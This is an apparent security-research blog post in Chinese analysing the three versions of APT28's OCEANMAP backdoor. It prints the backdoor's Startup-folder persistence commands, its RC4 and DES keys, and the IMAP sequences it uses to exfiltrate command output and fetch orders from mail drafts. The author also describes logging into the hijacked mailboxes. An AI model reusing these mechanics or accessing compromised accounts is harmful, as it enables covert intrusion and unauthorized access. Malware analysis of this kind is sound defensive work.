新手法！APT28组织最新后门内置大量被控邮箱（可成功登录）用于窃取数据

文章首发地址：
https://xz.aliyun.com/t/14123
文章首发作者：
T0daySeeker

概述

近期，笔者在浏览网络中威胁情报信息的时候，发现美国securityscorecard安全公司于2024年3月5日发布了一篇《A technical analysis of the APT28’s backdoor called OCEANMAP》白皮书报告，此报告对APT28组织使用的OCEANMAP后门进行了详细介绍。

整篇报告的内容不多，全是对OCEANMAP后门功能的描述，笔者很快就浏览完了。浏览完后，笔者也是对OCEANMAP后门产生了一定的兴趣，结合网络中的其他调研信息，也同时让笔者理解了美国securityscorecard安全公司为什么会专门发布一篇白皮书对OCEANMAP后门进行研究：

• 其实根据样本分析结果，此OCEANMAP后门的整体功能不是特别的复杂，而且其是由C#语言编写的，分析难度也不是很高；

• 根据网络调研信息，OCEANMAP后门被乌克兰国家计算机应急响应中心首次于2023年12月28日曝光，算是一款比较新的后门；

• 根据网络调研信息，OCEANMAP后门归属于APT28组织；

• 根据样本分析结果，此OCEANMAP后门的恶意行为利用方式与我们常见的木马利用方式有所不同，此OCEANMAP后门通过邮件接收远控指令及返回远程指令执行结果；

通过网络调研，笔者将网络中能下载的所有曝光的OCEANMAP后门进行了梳理对比，情况如下：

为便于对比分析，笔者基于支持命令及加解密算法将此系列样本分为了三个版本：

• 第一版本：使用的加解密算法为RC4+Base64
• 第二版本：使用的加解密算法为DES+Base64
• 第三版本：使用的加解密算法为Base64

相关网络报道截图如下：

OCEANMAP后门分析

移动自身至启动目录

通过分析，笔者发现除第三版本样本外，其余样本的自启动方式均相同，均是通过将自身移动至启动目录中以实现自启动功能。

相关cmd命令如下：

move /Y email.exe "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\email.exe"

move /Y igmtSX.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\igmtSX.exe"

相关代码截图如下：

启动目录中创建快捷方式

通过对第三版本样本进行分析，发现此样本运行后，将执行一系列初始化操作：

• 判断系统中是否已运行另一个同名进程，若是，则终止同名进程；
• 判断文件名中是否包含“_tmp.exe”字符串，若是，则重命名文件并执行；

相关代码截图如下：

初始化操作代码执行完后，样本将在启动目录中创建快捷方式，以实现自身自启动操作，相关截图如下：

内置邮箱账户信息

通过分析，发现在OCEANMAP后门中，内置了邮箱账户信息，相关代码截图如下：

生成用户ID

通过分析，发现OCEANMAP后门运行后，将根据主机信息（主机名、用户名、系统版本）生成用户ID，此用户ID将作为接收特定远控指令的标识，因此其将被作为邮件主题添加至邮件中。

第一二版本样本代码截图如下：

第三版本样本代码截图如下：

收件箱添加邮件-返回初始命令执行结果

通过分析，发现OCEANMAP后门中内置了初始命令，后门运行后，将以邮件形式返回初始命令执行结果，并以此作为后门上线信息，相关初始命令梳理如下：

相关代码截图如下：

提取草稿箱内容-接收远控指令

通过分析，发现当OCEANMAP后门向收件箱添加邮件后，下一步则将从邮箱草稿箱中提取远控指令命令，提取远控指令的方式为：

• 搜索邮件主题内容中包含对应用户ID的邮件；
• 提取对应邮件内容并对其进行解密（RC4+Base64、DES+Base64、Base64）；

相关代码截图如下：

第一版样本加解密算法-RC4+Base64

通过分析，发现OCEANMAP后门第一版样本使用的邮件内容加解密算法为RC4+Base64，相关代码截图如下：

第一版样本向收件箱添加邮件及从草稿箱提取远控指令时，均会调用RC4+Base64算法对邮件内容进行加解密。

向收件箱添加邮件的代码截图如下：

提取远控指令内容的代码截图如下：

提取RC4密钥如下：

8C18634C6374CE4E75F155F806808F0532FEF8A8472DB2543390A3A48CB69B7CB143BCE139919D33C209220170F0D98FDE4FA497F668EC180AE29F13DBECE33E97D5E8438619CE70283DDC0A392A27193A043E026FC45EB39A44F3526F80F720F3966AA171BE577483BE7D1CF60B50CC96BA56FEE54909A319E3C945B342B89EADA490EA8631908F2E2871EF556BF121E61DE9351E41D19D24714BD071AA3E22CEE916D08459D9071670B61603128A5C2D5781086DB11E5580CC55CBEE716791C36986B91086305FA4E47D8EE370E8F1722CA8CDA944ED8E2550F29CA285EC63CD893A123101CB927CE9B79647AE331726066D6264280C9A4AE540C279986669

解密效果如下：

第二版样本加解密算法-DES+Base64

通过分析，发现OCEANMAP后门第二版样本使用的邮件内容加解密算法为DES+Base64，相关代码截图如下：

第二版样本向收件箱添加邮件及从草稿箱提取远控指令时，均会调用DES+Base64算法对邮件内容进行加解密。

向收件箱添加邮件的代码截图如下：

提取远控指令内容的代码截图如下：

提取DES-CBC密钥如下：

key：
4862714339216D56
IV：
1C0B330C201A0729

解密效果如下：

第三版样本加解密算法-Base64

通过分析，发现OCEANMAP后门第三版样本向收件箱添加邮件时，并未使用加密算法对其邮件内容进行加密，相关代码截图如下：

从邮件内容中解密提取远控指令解密算法为Base64，相关代码截图如下：

远控指令

通过分析，梳理发现OCEANMAP后门系列样本中目前共存在两个远控指令：

• changesecond：用于修改内置的邮箱账户信息（备注：第一版本样本中内置的change_指令功能与changesecond指令功能相同）
• newtime：用于修改内置的程序休眠时间

changesecond指令代码截图如下：

newtime指令代码截图如下：

OCEANMAP后门通信模型分析

模拟构建邮服

为了能够详细的对OCEANMAP后门通信模型进行研究分析，笔者准备尝试构建一套模拟的邮件服务器，虽然构建邮件服务器的过程并不是很难，但是笔者在利用模拟的邮件服务器进行模拟复现的时候，却遇到了一些小曲折，因此，笔者还是决定将相关曲折历程简单写下来：

• 阶段一：起初，为了能够快速的模拟构建邮件服务器，笔者选择了windows系统下的hMailServer软件进行构建
• 问题：实际模拟复现的时候，笔者发现hMailServer软件构建的邮件服务器无法使用WEB方式访问，因此只能使用foxmail等邮件客户端进行访问，但使用foxmail等邮件客户端进行写草稿的时候，「草稿箱内容不会保存至邮件服务器中」（使用foxmail保存草稿、退出邮箱账号后，再次登录邮箱账户，发现没有草稿内容）。
• 阶段二：笔者推测支持WEB方式访问的邮件服务器才支持将草稿内容保存至邮件服务器中，因此，笔者又选择了windows系统下的MailEnable软件进行构建
• 问题：实际模拟复现的时候，笔者发现MailEnable软件构建的邮件服务器可以使用WEB方式访问，但是却「不能响应OCEANMAP后门向收件箱添加邮件的指令」。
• 阶段三：笔者选择了hmailserver+phpstudy+roundcube的方式构建邮件服务器，参考网页：https://blog.csdn.net/ljh_mm/article/details/131221407
• 问题：实际模拟复现的时候，笔者发现邮件服务器可以使用WEB方式访问，也能够成功响应OCEANMAP后门向收件箱添加邮件的指令，但是却「不能响应OCEANMAP后门从草稿箱提取邮件内容的指令」。
• 由于笔者暂未进一步进行模拟构建邮件服务器，因此也不清楚具体是什么导致不能响应OCEANMAP后门从草稿箱提取邮件内容的指令，结合实际被控邮箱的邮件服务器使用的有Linux系统，推测Linux环境下的邮件服务器可正常响应OCEANMAP后门行为。

阶段二中“不能响应OCEANMAP后门向收件箱添加邮件的指令”截图如下：

阶段三中第一版样本添加的邮件内容截图如下：

阶段三中第二版样本添加的邮件内容截图如下：

阶段三中第三版样本添加的邮件内容截图如下：

阶段三中“不能响应OCEANMAP后门从草稿箱提取邮件内容的指令”相关截图如下：

通信模型分析

基于模拟构建的邮件服务器进行模拟通信，梳理此系列样本的通信模型如下：

第一版样本

第一版样本IMAP协议指令内容如下：

向收件箱添加邮件的指令
$ LOGIN [email protected] 123456
$ APPEND Inbox {772}
From: admin
Subject: 2024/3/17 12:58:36_report_V0lOLUpNS0pFTUpDNE9UX2FkbWluX01pY3Jvc29mdCBXaW5kb3dzIE5UIDYuMS43NjAxIFNlcnZpY2UgUGFjayAx

nnySSzuwWyaNmXxX1Gkrt3X28lNAgAt+UmEiAOnQKa9MRe09/DQCtDmRRHbeYh+Ba7ORvWLRFRMNt5lEO6+xL4a68e75iMZmyMepDYGSr5uzY1M+qXy3QHjr9Rd+aVm81Lfg0mH22eJTzDg4ksyt594acm8znq9pxZgw1kWchJQDrJTOfdAf2MmDBH9rZmIfdqeLXCKPWTwupDrAMcLqR8DKYimwnpJVApAgZpJY1XnDJpTUBIWfZQrntE2zOhfnlKhvgCh/L6aB/DxiZdAerHCC9zhs0cBC0EkTITx+nIDZ9jjf9K2zsFwiULF0hfHHSpoVIJ6Tri9b51h5pXQjPm2GXsl8GRmSZ3dUPeY9dmhCTTjvyvFsrz1ekHH79fRpXoP2ulacyGDM0b3cpr9VWWt9DCoWf4w/P58XghVcR/yUcTF9byKideRmEWfU8GWur/kZsowf1L2rj+zDVuUtvDmILa9ku9t7SHDR3N0RntH51YHntO/CFnf6q1dSU9QMUfxeVvzhOlS/4j5o97WcmJG8cTeZujAcSimQGASl5eJEbcqW1xfhi4x4k0HN4mdvg59ZE7jmeh1SkOGEaPEqEfRjb59dyisIO2XQqxHBh3vK/pZxVzw8og==

从草稿箱提取邮件内容的指令
$ LOGIN [email protected] 123456
$ SELECT Drafts
$ UID SEARCH subject "V0lOLUpNS0pFTUpDNE9UX2FkbWluX01pY3Jvc29mdCBXaW5kb3dzIE5UIDYuMS43NjAxIFNlcnZpY2UgUGFjayAx"

第一版样本通信数据包截图如下：

第二版样本

第二版样本IMAP协议指令内容如下：

向收件箱添加邮件的指令
$ LOGIN [email protected] 123456
$ APPEND INBOX {530}
From: n_admin
Subject: a___2024/3/17 13:03:40_report_V0lOLUpNS0pFTUpDNE9UX2FkbWluX01pY3Jvc29mdCBXaW5kb3dzIE5UIDYuMS43NjAxIFNlcnZpY2UgUGFjayAx

YHteuYKpKHFj0s9+zt/OpjBQgSI5WmpnroYl5h7edCvWXfKmfymVBIKqAff1sFm7bEbg4KMx7w52LCAz8YpQCV6sJmX+xmSelt7tG8gPfIU0cFjEE7bN7gjrKi54Xej4ja48PvM6QF9DWCUyYNYyNXfiPK/I1sD7FbngxWfmPnP0WMVAFp1a5rqpL1XVF2z6fBEADFGkt/P8oFihnORHpCmAF3ssY6wC+z/qxobiGLFdRpbGjVxd/IGkQ6lwZZ5+J5glIeGumAU/PW6y76Pif5IyvuyvrfoBATA8D0bqVQV301aZ/F6xD3JW0Rth3O9V7yOBpG4UuDDyrMOpIW/CPFkIXE417lJ2QbEoFrdTcavSmJevEbajTeaNRvabbw37
$ APPEND INBOX {2090}
From: n_admin
Subject: a___2024/3/17 13:03:40_report_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

从草稿箱提取邮件内容的指令
$ LOGIN [email protected] 123456
$ SELECT Drafts
$ UID SEARCH subject "V0lOLUpNS0pFTUpDNE9UX2FkbWluX01pY3Jvc29mdCBXaW5kb3dzIE5UIDYuMS43NjAxIFNlcnZpY2UgUGFjayAx"

第二版样本通信数据包截图如下：

第三版样本

第三版样本IMAP协议指令内容如下：

向收件箱添加邮件的指令
$ LOGIN [email protected] 123456
$ APPEND INBOX {686}
From: U_admin
Subject:2024/3/17 12:40:30_report_V0lOLUpNS0pFTUpDNE9UPT1hZG1pbj09TWljcm9zb2Z0IFdpbmRvd3MgTlQgNi4xLjc2MDEgU2VydmljZSBQYWNr

Microsoft Windows [?? 6.1.7601]
??????? (c) 2009 Microsoft Corporation???????????????

C:UsersadminDesktop22>dir
 ?????? C ???????????
 ?????????? DEA8-B705

 C:UsersadminDesktop22 ????

2024/03/17  20:36    <DIR>          .
2024/03/17  20:36    <DIR>          ..
2024/03/17  20:37            24,576 222
               1 ?????         24,576 ???
               2 ???? 47,767,097,344 ???????

C:UsersadminDesktop22>

newtime1:0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

从草稿箱提取邮件内容的指令
$ LOGIN [email protected] 123456
$ SELECT INBOX.Drafts
$ UID SEARCH subject "V0lOLUpNS0pFTUpDNE9UPT1hZG1pbj09TWljcm9zb2Z0IFdpbmRvd3MgTlQgNi4xLjc2MDEgU2VydmljZSBQYWNr"
$ UID FETCH folder BODY.PEEK[text]
$ UID STORE folder +FLAGS (Deleted)
$ EXPUNGE
$ UID FETCH selected. BODY.PEEK[text]
$ UID STORE selected. +FLAGS (Deleted)
$ EXPUNGE

第三版样本通信数据包截图如下：

被控邮箱梳理

通过分析，对搜集的OCEANMAP后门样本中内置的被控邮箱进行梳理，提取了8个邮件服务器地址，13个被控邮箱账户密码，相关梳理信息如下：

登录被控邮箱

使用安全网络尝试登录被控邮箱，发现可成功登录，详细情况如下：

[email protected]邮箱登录截图如下：

[email protected]邮箱登录截图如下：

邮服被控原理推测

通过分析，笔者发现可成功登录的多个邮箱服务访问页面相同，进一步对比分析，笔者发现其页面结构与笔者模拟构建的邮件服务器页面也比较相同，因此，笔者就推测攻击者是否批量获取了使用相同Web邮件客户端的邮件服务器：

• 笔者模拟构建的邮件服务器使用的是roundcube邮件客户端
• 进一步对比分析，发现多个被控邮箱的邮件服务器确实是使用的roundcube邮件客户端

相关截图如下：